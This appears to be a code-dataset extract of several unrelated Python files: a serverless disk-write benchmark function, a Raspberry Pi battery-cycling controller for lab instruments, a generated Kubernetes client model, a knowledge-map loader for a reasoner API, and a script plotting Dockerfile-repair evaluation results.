hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a10f44ad6fe4307baa0cd97a8b555c0dab7c1fa
| 442
|
py
|
Python
|
evaluations/alg/App4/functions/f1/lambda_function.py
|
pacslab/SLApp-PerfCost-MdlOpt
|
9b9fb13b9e914a7fe5c89da570bd95baff73276e
|
[
"MIT"
] | 8
|
2020-08-07T02:03:02.000Z
|
2022-03-02T10:27:14.000Z
|
evaluations/alg/App5/functions/f1/lambda_function.py
|
pacslab/SLApp-PerfCost-MdlOpt
|
9b9fb13b9e914a7fe5c89da570bd95baff73276e
|
[
"MIT"
] | null | null | null |
evaluations/alg/App5/functions/f1/lambda_function.py
|
pacslab/SLApp-PerfCost-MdlOpt
|
9b9fb13b9e914a7fe5c89da570bd95baff73276e
|
[
"MIT"
] | 4
|
2020-08-24T14:35:41.000Z
|
2021-04-23T18:57:45.000Z
|
import json
import os
def lambda_handler(event, context):
path = '/tmp/1MB'
file_indicator=os.path.isfile(path)
if file_indicator:
os.remove(path)
for i in range(50):
f = open(path, 'wb')
f.write(os.urandom(1048576))
f.flush()
os.fsync(f.fileno())
f.close()
return {
'statusCode': 200,
'body': json.dumps({'name':'f1', '1MB':file_indicator})
}
| 21.047619
| 63
| 0.547511
|
4a10f50647df774bccb47523d3818a38feb933eb
| 16,191
|
py
|
Python
|
software/validation.py
|
DeltaLabo/battery_characterizer
|
c9fa22687570a80fcf7131faa932c585fa053cf1
|
[
"MIT"
] | null | null | null |
software/validation.py
|
DeltaLabo/battery_characterizer
|
c9fa22687570a80fcf7131faa932c585fa053cf1
|
[
"MIT"
] | null | null | null |
software/validation.py
|
DeltaLabo/battery_characterizer
|
c9fa22687570a80fcf7131faa932c585fa053cf1
|
[
"MIT"
] | null | null | null |
'''
@file Ciclador de baterías
@author Diego Fernández Arias
@author Juan J. Rojas
@date Sep 28 2021
Instituto Tecnológico de Costa Rica
Laboratorio Delta
'''
import pyvisa
import numpy as np
import controller2
import time
from time import sleep
import threading
import pandas as pd
from datetime import datetime
import math
import RPi.GPIO as GPIO
import board
import digitalio
import adafruit_max31855
#GPIO.cleanup() pasarlo al final
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(17,GPIO.OUT) #Pin #17 RPi
GPIO.setup(18,GPIO.OUT) #Pin #18 RPi
GPIO.output(17, GPIO.LOW)
GPIO.output(18,GPIO.LOW)
GPIO.setup(24, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) #Change of State Button
GPIO.setup(22, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) #Shutdown Button
##########################Definición 'controller2'##################################
#rm = pyvisa.ResourceManager()
#print(rm.list_resources())
#fuente = rm.open_resource(rm.list_resources()[1])
#fuente.write_termination = '\n'
#fuente.read_termination = '\n'
rm = pyvisa.ResourceManager()
print(rm.list_resources()[1])
for i in range(3):
if rm.list_resources()[i].find("DL3A21") > 0:
carga = rm.open_resource(rm.list_resources()[i])
print("Carga DL3A21 encontrada")
print(carga.query("*IDN?"))
elif rm.list_resources()[i].find("SPD13") > 0:
fuente = rm.open_resource(rm.list_resources()[i])
print("Fuente SPD1305X encontrada")
#print("Fuente SPD1305X encontrada")
#else:
#print("No se ha detectado la fuente o la carga")
Fuente = controller2.Fuente(fuente, "SPD1305", tipoFuente = True) # SPD parámetro para iterar cuando hay más recursos
Carga = controller2.Carga(carga, "DL3021")
#############################################################################################
# rm = pyvisa.ResourceMana"Power"ger()
# print(rm.list_resources()) #Retorna los recursos (fuente y carga)
# fuente = rm.open_resource(rm.list_resources()[0])
# #print(fuente.query("*IDN?")) #Verificar orden dela fuente y la carga
# Fuente = controller2.Fuente(fuente, "Diego") #'Diego' parámetro para iterar cuando hay más recursos
#definir estructura
outputCSV = pd.DataFrame(columns = ["Timestamp", "Time", "Voltage", "Current", "Capacity", "Temperature"])
############### Read needed csv files ###############
df = pd.read_csv('/home/pi/Repositories/battery_characterizer/software/prueba_inputs.csv', header=0)
powd = pd.read_csv('/home/pi/Repositories/battery_characterizer/bat_data/bat40.csv')
# modeldf = pd.read_csv('home/pi/Repositories/battery_characterizer/validation/parameters.csv')
########################################################################
#Variables globales que se utilizará dentro de cada función
state = "INIT"
channel = df.iloc[0,0] #[row,column] channel global variable (Channel 1 by default)
volt = 1.0
current = 1.0
power = 1.0
timer_flag = 0
init_flag = 1
mintowait = 0
prev_state = 0
next_state_flag = 0
cycles = 0
counter = 0
cycle_counter = 0
past_time = datetime.now()
past_curr = 0
capacity = 0
tempC = 0
seconds = 0.0
end_flag = 0
charge_only = 0
######
# Initial values #
i_0 = 0 # El capacitor se comporta como un corto
z_0 = 0.9835 # Cómo escojo el z según la V de la celda?
v_0 = 4.15 # interpolation() ¿Es igual a ocv en el primer momento?
#dt = 1 # 1s de delta time
Q = 3.20347 # Capacidad en Ah
#n = 1 #Eficiencia (debería variar en carga y descarga)
####
file_date = datetime.now().strftime("%d_%m_%Y_%H_%M")
spi = board.SPI()
cs = digitalio.DigitalInOut(board.D5)
max31855 = adafruit_max31855.MAX31855(spi, cs)
# Cambiar por la generic interpolation #
def sec_interpolation(sec_data, pow_data, sec_in):
for i in range(len(sec_data)-1):
if sec_in < sec_data[0]:
pow_out = pow_data[0]
break
if sec_in > sec_data[len(sec_data)-1]:
pow_out = pow_data[len(sec_data)-1]
break
if sec_data[i+1] >= sec_in and sec_data[i] <= sec_in:
pow_out = pow_data[i] + (pow_data[i+1] - pow_data[i]) * ((sec_in - sec_data[i]) / (sec_data[i+1] - sec_data[i]))
break
return pow_out
def interpolation(x_data, y_data, x_in): #Usar con R0, R1, C1
for i in range(len(x_data)-1):
if x_in < x_data[0]:
x_out = y_data[0] #Cambiar por extrapolación
break
if x_in > x_data[len(x_data)-1]:
x_out = y_data[len(x_data)-1] #Cambiar por extrapolación
break
if x_data[i+1] >= x_in and x_data[i] <= x_in: #Función de interpolación
x_out = y_data[i] + (y_data[i+1] - y_data[i]) * ((x_in - x_data[i]) / (x_data[i+1] - x_data[i]))
break
return x_out
##########################Se define el diccionario con los estados##################################
#Primero se definirá la base de la máquina de estados (utilizando diccionapandas append csvrios)
def statemachine (entry):
global state
switch = {"INIT" : INIT,
"CHARGE" : CHARGE,
"DISCHARGE" : DISCHARGE,
"END" : END,
}
func = switch.get(state)
return func(entry)
#########################Se define la función del estado inicial#####################################
def INIT(entry):
global state
global init_flag
global cycles
global cycle_counter
global charge_only
global seconds
global int_pow
global past_time
if cycles == 0:
print ('''
'.` `--`
-``':>rr, '<\*!-` `'
^- -\kx" '*yT! r
x: ~sKr` :uMx. y
rY !Idv' ^KZv` _w
-O: :KRu_ `*qd(` z*
TH` *MRu- `*5Eu' (O`
-dy `x66L' =PDK: !Rx
rEY _jDdvzEdr` ,d3`
TDY rEED3' ,Zd_
`hDY ^ZEw5Ey- ,ZR~
.GD}` -wDZx:ruEd* :ZE(
`.^6Eyrvx}uVwXhmdDyL#\gO?MDHIkyu}Lx)*rdDu`
`_~rLymMRDEO6EDqjkycukEDOv3@@\g@#vyDD5VVkjsKREEEDRZ3wY?>:'
_^YwXkTxr<!,-`` -PE5, ,MDI(B@@@\g@@@KrdRi` iEE( ``-,:>rv}yIk}*,`
!r\k!. 'hEd~ ^ORxu@@@@@\g@@@@8*GDI-`yER* ':^\k~`
-!. `yDRIEO*Z@@@@@@\g@@@@@#*yDMHEd= `!,
` YEDq^Q@@@@@@@*Z@@@@@@@YvRDd, ``
_!` _GEy)#@@@#O33Z#gP3H8@@@@Z^ZEY` `:"
`~r(~_` :ZEx}@@RPPMB@@@@@@@@$PPMB@Q^KDV` `-=)r^'
`:(uwzuxr<!_.` :d6*(P3GB@@@@@@@@@@@@@@@#OPPX:kDw` `'_:~*v}wkcv=`
`,>\}zGOEOMHmjdEzr(zhsmsIIhssmmmmshIXImmssT*\dD5PMdE65Xlv^:'
`.,!}DEu}uyzhKHqZEDD6ddddRDDOHKsjyu}xvmDM!-`
_ZRr ^ZEM= `YREw- `XEc
`3Rr 'TREyqEM^ `jEv
uE) ^REDP' `hR!
<Ex *ZEIMEX, 'P5`
`Zc =HDX: `rZEu- -Z}
\H` ,zEh= `?ZOx` ~O-
P= .uRz! `r5q*` u\
-I -idT, `*3G*` ,V
-\ =yI*` _xKi_ x
! ,?Yr- :xi*- '"
``-"=:` '!!_.`
''')
seconds = float(input("Segundos iniciales: \n"))
int_pow = sec_interpolation(powd.time, powd.power, seconds)
if input("Desea iniciar?: \n") == 'y':
if int_pow > 0:
state = "DISCHARGE"
else:
state = "CHARGE"
init_flag = 1
cycle_counter += 1
past_time = datetime.now()
print("Iniciando...")
def poweroff(channel):
global state
global end_flag
GPIO.output(17, GPIO.LOW)
GPIO.output(18, GPIO.LOW)
Fuente.apagar_canal(channel)
Carga.apagar_carga()
print("El sistema se ha apagado")
state = "END"
end_flag = 1
GPIO.add_event_detect(22, GPIO.RISING, callback=poweroff, bouncetime=1000)
#Interrupt Service Routine
#Executed in response to an event such as a time trigger or a voltage change on a pin
def ISR():
global timer_flag
t = threading.Timer(1.0, ISR) #ISR se ejecuta cada 1 s mediante threading
t.start()
timer_flag = 1 #Al iniciar el hilo, el timer_flag pasa a ser 1
#Thread de medición
def medicion():
global volt
global current
global power
global state
global outputCSV
global max31855
global past_time
global past_curr
global capacity
global file_date
global seconds
global tempC
global channel
global cycle_counter
######
global z_0
global i_0
global v_0
global Q
tiempo_actual = datetime.now()
deltat = (tiempo_actual - past_time).total_seconds()
seconds += deltat
if state == "CHARGE":
volt,current = Fuente.medir_todo(channel) #Sobreescribe valores V,I,P
current = -current
n = 0.932333
elif state == "DISCHARGE":
volt,current = Carga.medir_todo() #Sobreescribe valores V,I,P
n = 1
tempC = max31855.temperature #Measure Temp
if tempC >= 60:
poweroff(channel)
print("Cuidado! La celda ha excedido la T máxima de operación")
capacity += deltat * ((current + past_curr) / 7.2) #documentar porque 7.2 sino se te va a olvidar
past_time = tiempo_actual
past_curr = current
print("{:09.2f} c = {:02d} V = {:06.3f} I = {:06.3f} Q = {:07.2f} T = {:06.3f}".format(seconds, cycle_counter, volt, current, capacity, tempC))
##### INICIO DEL MODELO #####
# Define values for interpolartion #
# z_data = modeldf.soc.values
# r0_data = modeldf.r0.values
# r1_data = modeldf.r1.values
# c1_data = modeldf.c1.values
# # Definir arrays donde se escribirán las interpolaciones
# z_r = np.array([z_0])
# z_p = np.array([0])
# i_R1 = np.array([0])
# v = np.array([v_0])
# # t = np.array([0])
# # Ecuaciones discretizadas #
# z_r = np.append(z_r, z_0 - ( (deltat*n*current)/Q ) )
# #Modelo
# ocv_p = volt + interpolation(z_data, r1_data, z_0)*i_R1 + interpolation(z_data, r0_data, z_0)*current
# z_p = interpolation(ocv_data, z_data, ocv_p)
# i_R1 = np.append(i_1, math.exp(-deltat / interpolation(z_data, r1_data, z_0) * interpolation(z_data, c1_data, z_0)) * (i_0) + (1 - math.exp(-deltat / (interpolation(z_data, r1_data, z_0) * interpolation(z_data, c1_data, z_0) ) ) ) * current)
# v = np.append(v, (interpolation(z_data, ocv_data, z_0)) - (interpolation(z_data, r1_data, z_0) * (i_0)) - (interpolation(z_data, r0_data, z_0) * current))
# z_0 = z_r[-1]
# i_0 = i_R1[-1]
##### FINAL DEL MODELO #####
# Create csv to write the measurements
base = "/home/pi/cycler_data/"
outputCSV = outputCSV.append({"Timestamp":tiempo_actual,"Time":round(seconds,2), "Voltage":volt, "Current":current, "Capacity":round(capacity,2), "Temperature":tempC}, ignore_index=True)
filename = base + "validation" + file_date + ".csv"
outputCSV.iloc[-1:].to_csv(filename, index=False, mode='a', header=False) #Create csv for CHARGE
# # Create csv of the model predicted values
# model_validation = pd.DataFrame(data={"soc_predicted":z_1, "i_r1":i_1,"v":v})
# model_validation.to_csv('home/pi/Repositories/battery_characterizer/validation/validation.csv', index=False, mode='a', header=["soc_predicted","i_r1", "v"])
#Función para controlar módulo de relés (CH1 y CH2)
def relay_control(state):
if state == "CHARGE": #Charge - CH1
GPIO.output(18,GPIO.LOW)
time.sleep(0.05)
GPIO.output(17,GPIO.HIGH)
time.sleep(0.05)
elif state == "DISCHARGE": #Discharge - CH2
GPIO.output(17,GPIO.LOW)
time.sleep(0.05)
GPIO.output(18,GPIO.HIGH)
time.sleep(0.05)
################# Se define la función que hará que la batería se cargue ############################
def CHARGE (entry):
global powd
##
global prev_state
global state
global channel
global volt
global current
global power
global capacity
global init_flag
global timer_flag
global next_state_flag #FLAG CAMBIO DE ESTADO
global past_time
global seconds
if init_flag == 1:
init_flag = 0
relay_control(state) #CHARGE
Fuente.toggle_4w() #Activar sensado
Fuente.aplicar_voltaje_corriente(channel, 4.2, 0)
Fuente.encender_canal(channel)
time.sleep(0.1)
timer_flag = 1
if timer_flag == 1:
timer_flag = 0
medicion()
int_pow = sec_interpolation(powd.time, powd.power, seconds)
if int_pow > 0:
state = "DISCHARGE"
Fuente.apagar_canal(channel)
Fuente.toggle_4w()
init_flag = 1
else:
int_curr = -int_pow / volt
Fuente.aplicar_voltaje_corriente(channel, 4.2, int_curr)
if seconds > powd.time[len(powd)-1]:
state = "END"
################# Se define la función que hará que la batería se descargue #########################
#Se setea el recurso de la CARGA para descargar la batería
def DISCHARGE(entry):
global prev_state
global state
global channel
global volt
global current
global power
global capacity #Faltó ponerlo para reiniciar la C en descarga
global init_flag
global timer_flag
global next_state_flag #FLAG CAMBIO DE ESTADO
global past_time
global seconds
global file_date
###################################################################
if init_flag == 1:
init_flag = 0
relay_control(state) #CHARGE
Carga.remote_sense(True) #Activar sensado
Carga.fijar_corriente(0)
Carga.encender_carga() #Solo hay un canal (el #1)
time.sleep(0.1)
#past_time = datetime.now()
timer_flag = 1
if timer_flag == 1:
timer_flag = 0
medicion()
int_pow = sec_interpolation(powd.time, powd.power, seconds)
if int_pow < 0:
state = "CHARGE"
Carga.apagar_carga()
init_flag = 1
else:
int_curr = int_pow / volt
Carga.fijar_corriente(int_curr)
if seconds > powd.time[len(powd)-1]:
state = "END"
##################################################################
################ Se define la función que esperará y retornará al estado inicial ####################
####Función final. Apagará canal cuando se hayan cumplido ciclos o reiniciará
def END(entry):
global cycle_counter
global end_flag
global state
print("Terminó el ciclo...")
poweroff(channel)
if cycle_counter >= cycles:
end_flag = 1
else:
state = "INIT"
######################## Programa Principal (loop de la máquina de estado) ########################
t = threading.Timer(1.0, ISR)
t.start() #Después de 5 segundos ejecutará lo de medición ()
while end_flag == 0:
statemachine("INIT")
print("Terminó el programa")
| 36.548533
| 247
| 0.53505
|
4a10f5eea7fdec86fcdb282fa931cae31abfe6fe
| 7,612
|
py
|
Python
|
kubernetes/client/models/v1_replication_controller_condition.py
|
mariusgheorghies/python
|
68ac7e168963d8b5a81dc493b1973d29e903a15b
|
[
"Apache-2.0"
] | null | null | null |
kubernetes/client/models/v1_replication_controller_condition.py
|
mariusgheorghies/python
|
68ac7e168963d8b5a81dc493b1973d29e903a15b
|
[
"Apache-2.0"
] | null | null | null |
kubernetes/client/models/v1_replication_controller_condition.py
|
mariusgheorghies/python
|
68ac7e168963d8b5a81dc493b1973d29e903a15b
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v1.20.7
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client.configuration import Configuration
class V1ReplicationControllerCondition(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'last_transition_time': 'datetime',
'message': 'str',
'reason': 'str',
'status': 'str',
'type': 'str'
}
attribute_map = {
'last_transition_time': 'lastTransitionTime',
'message': 'message',
'reason': 'reason',
'status': 'status',
'type': 'type'
}
def __init__(self, last_transition_time=None, message=None, reason=None, status=None, type=None, local_vars_configuration=None): # noqa: E501
"""V1ReplicationControllerCondition - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._last_transition_time = None
self._message = None
self._reason = None
self._status = None
self._type = None
self.discriminator = None
if last_transition_time is not None:
self.last_transition_time = last_transition_time
if message is not None:
self.message = message
if reason is not None:
self.reason = reason
self.status = status
self.type = type
@property
def last_transition_time(self):
"""Gets the last_transition_time of this V1ReplicationControllerCondition. # noqa: E501
The last time the condition transitioned from one status to another. # noqa: E501
:return: The last_transition_time of this V1ReplicationControllerCondition. # noqa: E501
:rtype: datetime
"""
return self._last_transition_time
@last_transition_time.setter
def last_transition_time(self, last_transition_time):
"""Sets the last_transition_time of this V1ReplicationControllerCondition.
The last time the condition transitioned from one status to another. # noqa: E501
:param last_transition_time: The last_transition_time of this V1ReplicationControllerCondition. # noqa: E501
:type: datetime
"""
self._last_transition_time = last_transition_time
@property
def message(self):
"""Gets the message of this V1ReplicationControllerCondition. # noqa: E501
A human readable message indicating details about the transition. # noqa: E501
:return: The message of this V1ReplicationControllerCondition. # noqa: E501
:rtype: str
"""
return self._message
@message.setter
def message(self, message):
"""Sets the message of this V1ReplicationControllerCondition.
A human readable message indicating details about the transition. # noqa: E501
:param message: The message of this V1ReplicationControllerCondition. # noqa: E501
:type: str
"""
self._message = message
@property
def reason(self):
"""Gets the reason of this V1ReplicationControllerCondition. # noqa: E501
The reason for the condition's last transition. # noqa: E501
:return: The reason of this V1ReplicationControllerCondition. # noqa: E501
:rtype: str
"""
return self._reason
@reason.setter
def reason(self, reason):
"""Sets the reason of this V1ReplicationControllerCondition.
The reason for the condition's last transition. # noqa: E501
:param reason: The reason of this V1ReplicationControllerCondition. # noqa: E501
:type: str
"""
self._reason = reason
@property
def status(self):
"""Gets the status of this V1ReplicationControllerCondition. # noqa: E501
Status of the condition, one of True, False, Unknown. # noqa: E501
:return: The status of this V1ReplicationControllerCondition. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this V1ReplicationControllerCondition.
Status of the condition, one of True, False, Unknown. # noqa: E501
:param status: The status of this V1ReplicationControllerCondition. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and status is None: # noqa: E501
raise ValueError("Invalid value for `status`, must not be `None`") # noqa: E501
self._status = status
@property
def type(self):
"""Gets the type of this V1ReplicationControllerCondition. # noqa: E501
Type of replication controller condition. # noqa: E501
:return: The type of this V1ReplicationControllerCondition. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this V1ReplicationControllerCondition.
Type of replication controller condition. # noqa: E501
:param type: The type of this V1ReplicationControllerCondition. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and type is None: # noqa: E501
raise ValueError("Invalid value for `type`, must not be `None`") # noqa: E501
self._type = type
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1ReplicationControllerCondition):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1ReplicationControllerCondition):
return True
return self.to_dict() != other.to_dict()
| 32.118143
| 146
| 0.625197
|
4a10f611a449fb7d5f8243cd7ce07271218dc4ee
| 2,850
|
py
|
Python
|
reasonerAPI/python-flask-server/openapi_server/controllers/knowledge_map.py
|
codewarrior2000/molecular-data-provider
|
820b7db35cf6578f13671caaade2d48811447822
|
[
"MIT"
] | null | null | null |
reasonerAPI/python-flask-server/openapi_server/controllers/knowledge_map.py
|
codewarrior2000/molecular-data-provider
|
820b7db35cf6578f13671caaade2d48811447822
|
[
"MIT"
] | null | null | null |
reasonerAPI/python-flask-server/openapi_server/controllers/knowledge_map.py
|
codewarrior2000/molecular-data-provider
|
820b7db35cf6578f13671caaade2d48811447822
|
[
"MIT"
] | null | null | null |
import requests
import json
from contextlib import closing
from openapi_server.models.query_graph import QueryGraph
definition_file = 'transformer_chains.json'
class KnowledgeMap:
def __init__(self):
self.kmap = self.read_knowledge_map()
def read_knowledge_map(self):
kmap = {}
with open(definition_file,'r') as f:
for chain in json.loads(f.read()):
add_predicate(kmap, chain)
return kmap
def load_knowledge_map(self):
url = 'http://localhost:9200/molecular_data_provider/transformers'
kmap = {}
with closing(requests.get(url)) as response_obj:
response = response_obj.json()
for transformer in response:
for predicate in transformer['knowledge_map']['predicates']:
predicate['transformer_chain'] = transformer_as_chain(transformer)
add_predicate(kmap, predicate)
return kmap
def predicates(self):
return {
subject: {
object: list({predicate['predicate'] for predicate in predicates})
for (object, predicates) in objects.items()
}
for (subject, objects) in self.kmap.items()
}
def get_transformers(self, subject_class, predicate, object_class):
transformers = []
if subject_class in self.kmap and object_class in self.kmap[subject_class]:
for transformer in self.kmap[subject_class][object_class]:
if predicate is None or predicate == transformer['predicate']:
transformers.append(transformer)
return transformers
def match_query_graph(self, query_graph: QueryGraph):
nodes = {node.id:node for node in query_graph.nodes}
edge = query_graph.edges[0]
id = edge.id
source = nodes[edge.source_id]
target = nodes[edge.target_id]
subject_class = source.type
predicate = edge.type
object_class = target.type
edge = {'id':id, 'source':source, 'type':predicate, 'target':target}
return (edge,self.get_transformers(subject_class, predicate, object_class))
def transformer_as_chain(transformer):
name = transformer['name']
controls = []
for parameter in transformer['parameters']:
value = parameter['default'] if parameter['biolink_class'] is None else '#subject'
controls.append({'name':parameter['name'], 'value':value})
return [{'name':name, 'controls': controls}]
def add_predicate(kmap, predicate):
subject = predicate['subject']
object = predicate['object']
if subject not in kmap:
kmap[subject] = {}
if object not in kmap[subject]:
kmap[subject][object] = []
kmap[subject][object].append(predicate)
knowledge_map = KnowledgeMap()
| 31.318681
| 90
| 0.635088
|
4a10f6ee3a7fee2a370af87a5990aa70c2e24c86
| 6,065
|
py
|
Python
|
plotResults.py
|
mandoway/dfp
|
d8b1bd911fa810ce08e9719c9988e5a765b0128b
|
[
"Apache-2.0"
] | null | null | null |
plotResults.py
|
mandoway/dfp
|
d8b1bd911fa810ce08e9719c9988e5a765b0128b
|
[
"Apache-2.0"
] | null | null | null |
plotResults.py
|
mandoway/dfp
|
d8b1bd911fa810ce08e9719c9988e5a765b0128b
|
[
"Apache-2.0"
] | null | null | null |
import os
import pickle
import latextable as latextable
import matplotlib.pyplot as plt
import pandas as pd
from texttable import Texttable
from dfp_main import PatchStats
DEBUG_POS_DICT = {217: 9, 0: 240, 11: 3, 238: 6, 225: 16, 1: 51, 2: 13, 41: 2, 44: 2, 86: 3, 6: 3, 87: 5, 4: 21, 26: 5,
39: 3,
28: 1, 5: 15, 10: 5, 113: 2, 62: 2, 50: 3, 216: 3, 12: 5, 218: 3, 24: 8, 20: 4, 83: 2, 72: 3, 15: 2,
23: 2,
134: 6, 22: 3, 105: 3, 19: 3, 154: 1, 8: 6, 75: 1, 219: 3, 52: 4, 76: 3, 33: 8, 158: 4, 137: 4, 34: 2,
7: 13, 79: 2, 3: 2, 48: 6, 160: 1, 40: 1, 84: 6, 211: 8, 159: 1, 69: 3, 90: 4, 118: 4, 16: 2, 17: 1,
133: 2}
DEBUG_RULE_DICT = {'DL3008': 71, 'DL3009': 33, 'DL3015': 71, 'DL4000': 60, 'DL3005': 9, 'SC2086': 3, 'DL4006': 20,
'DL3020': 62, 'DL3007': 6, 'DL3013': 25, 'DL3042': 31, 'SC2028': 1, 'DL3003': 39, 'DL4001': 7,
'DL3025': 16, 'DL4003': 2, 'DL3006': 17, 'DL3010': 6, 'DL3032': 8, 'DL3033': 7, 'DL3004': 7,
'DL3001': 1,
'DL3018': 7, 'SC2155': 1, 'SC2164': 5, 'DL3028': 2, 'DL3014': 3, 'SC2039': 1, 'SC1073': 1,
'SC1009': 1,
'SC1132': 1, 'SC1072': 1, 'SC2046': 2, 'DL3002': 1, 'DL3019': 2, 'SC2016': 12, 'DL3016': 1,
'DL3000': 2,
'SC2174': 2, 'SC2006': 2}
def plotRules(rules: dict[str, int], title: str):
print(f"plotRules ({title}): ")
sorted_rules = sorted(rules.items(), key=lambda it: it[1], reverse=True)
print(sorted_rules)
x, y = zip(*sorted_rules)
plt.figure(figsize=(20, 6))
plt.title(title)
plt.bar(x, y)
plt.xticks(rotation=45)
plt.tight_layout()
plt.show()
print()
def tablePositions(positions: dict[int, int]):
bins = [1, 5, 10, 25, 50, 100]
rows = []
for bin_ in bins:
rows.append(
[bin_, sum(map(lambda it: it[1], filter(lambda it: it[0] + 1 <= bin_, positions.items())))]
)
rows.append(
["All", sum(map(lambda it: it[1], positions.items()))]
)
total = rows[-1][1]
x = bins + [total]
y = list(map(lambda it: it[1] / total, rows))
plt.plot(x, y)
plt.show()
table = Texttable()
table.set_deco(Texttable.HEADER | Texttable.VLINES)
table.set_cols_align(["c", "c"])
table.add_rows([
["Top-n", "Count"],
*rows
], header=True)
print(table.draw() + "\n")
print(latextable.draw_latex(table, caption="An example table.", label="tab:positions") + "\n")
def plotTimes(total_times: list[float], times_per_v: list[float]):
print("plotTimes")
fig, ax = plt.subplots()
ax.set_title("Execution times")
ax.set_ylabel("total in s")
result = ax.boxplot(total_times, showfliers=False, positions=[1])
print(f"total median: {result['medians'][0].get_ydata()}")
ax2 = ax.twinx()
ax2.set_ylabel("per violation in s")
result = ax2.boxplot(times_per_v, showfliers=False, positions=[2])
print(f"per viol median: {result['medians'][0].get_ydata()}")
ax.set_xticks([1, 2])
ax.set_xticklabels(["Total", "Per violation"])
plt.show()
print()
def readTestSetStats() -> dict[str, int]:
print("readTestSet:")
folder = "testSet"
rules = {}
num_violations = []
for file in sorted(os.listdir(folder)):
if file.endswith(".csv"):
data = pd.read_csv(f"{folder}/{file}")
num_violations.append(len(data))
for rule in data.rule.tolist():
if rule not in rules:
rules[rule] = 0
rules[rule] += 1
print(f"Avg number of violations in test set: {sum(num_violations) / len(num_violations)}")
print(f"Min violations: {min(num_violations)}")
print(f"Max violations: {max(num_violations)}")
print(f"Total violations: {sum(num_violations)}")
print()
return rules
def plotRulesVsTotal(rules: dict[str, int], total: dict[str, int]):
print("fixedVsTotal:")
percents = {}
for k, v in total.items():
if k in rules:
percents[k] = rules[k] / v * 100
else:
percents[k] = 0
sorted_rules = sorted(percents.items(), key=lambda it: it[1], reverse=True)
print(f"Sorted rules = {sorted_rules}")
x, y = zip(*sorted_rules)
rest = [100 - val for val in y]
plt.figure(figsize=(20, 6))
plt.title("Fix rate of rule violations")
plt.bar(x, y)
plt.bar(x, rest, bottom=y, color="r")
plt.ylabel("Fixed violations (%)")
plt.xticks(rotation=45)
plt.tight_layout()
plt.show()
print()
if __name__ == "__main__":
results_file = "evalStats_20072021_2023.pkl"
# results_file = "evalStats_28072021_1713.pkl"
with open(results_file, "rb") as f:
results: list[PatchStats] = pickle.load(f)
rule_list_file = results_file.removesuffix(".pkl") + "_rules.txt"
if not os.path.exists(rule_list_file):
with open(rule_list_file, "w") as f:
for r in results:
f.writelines(list(map(lambda it: str(it) + "\n", r.patches)))
f.write("\n")
times = list(map(lambda it: it.time, results))
avg_time = sum(times) / len(times)
times_per_violation = list(map(lambda it: it.time / it.total, results))
avg_time_per_violation = sum(times_per_violation) / len(times_per_violation)
verified_patches = [p for stat in results for p in stat.patches]
position_dist = {}
rule_dist = {}
for p in verified_patches:
if p.position not in position_dist:
position_dist[p.position] = 0
position_dist[p.position] += 1
if p.rule not in rule_dist:
rule_dist[p.rule] = 0
rule_dist[p.rule] += 1
testSet = readTestSetStats()
# plotRules(rule_dist, "Fixed violations")
plotRules(testSet, "Violations in test data set")
plotTimes(times, times_per_violation)
plotRulesVsTotal(rule_dist, testSet)
tablePositions(position_dist)
| 34.460227
| 120
| 0.573949
|
4a10f77632c24b9e4c2bed69bb088098bc5533a9
| 9,311
|
py
|
Python
|
